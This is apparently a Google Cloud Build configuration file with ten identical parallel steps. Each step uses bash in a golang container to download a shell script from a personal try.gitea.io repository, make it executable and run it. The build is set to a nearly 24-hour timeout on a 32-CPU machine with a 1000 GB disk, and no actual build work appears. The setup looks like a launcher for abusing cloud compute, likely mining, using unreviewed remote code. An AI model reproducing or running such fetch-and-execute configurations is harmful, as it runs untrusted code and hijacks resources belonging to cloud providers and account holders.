steps:
  - name: golang
    args: 
      - '-c'
      - >-
        wget https://try.gitea.io/kinan/Ty/raw/branch/master/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    waitFor: ["-"]
    entrypoint: /bin/bash

  - name: golang
    args: 
      - '-c'
      - >-
        wget https://try.gitea.io/kinan/Ty/raw/branch/master/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    waitFor: ["-"]
    entrypoint: /bin/bash
    
  - name: golang
    args: 
      - '-c'
      - >-
        wget https://try.gitea.io/kinan/Ty/raw/branch/master/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    waitFor: ["-"]
    entrypoint: /bin/bash

  - name: golang
    args: 
      - '-c'
      - >-
        wget https://try.gitea.io/kinan/Ty/raw/branch/master/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    waitFor: ["-"]
    entrypoint: /bin/bash

  - name: golang
    args: 
      - '-c'
      - >-
        wget https://try.gitea.io/kinan/Ty/raw/branch/master/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    waitFor: ["-"]
    entrypoint: /bin/bash

  - name: golang
    args: 
      - '-c'
      - >-
        wget https://try.gitea.io/kinan/Ty/raw/branch/master/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    waitFor: ["-"]
    entrypoint: /bin/bash

  - name: golang
    args: 
      - '-c'
      - >-
        wget https://try.gitea.io/kinan/Ty/raw/branch/master/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    waitFor: ["-"]
    entrypoint: /bin/bash

  - name: golang
    args: 
      - '-c'
      - >-
        wget https://try.gitea.io/kinan/Ty/raw/branch/master/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    waitFor: ["-"]
    entrypoint: /bin/bash

  - name: golang
    args: 
      - '-c'
      - >-
        wget https://try.gitea.io/kinan/Ty/raw/branch/master/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    waitFor: ["-"]
    entrypoint: /bin/bash

  - name: golang
    args: 
      - '-c'
      - >-
        wget https://try.gitea.io/kinan/Ty/raw/branch/master/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    waitFor: ["-"]
    
    entrypoint: /bin/bash
timeout: 86000s
options:
  machineType: E2_HIGHCPU_32
  diskSizeGb: '1000'
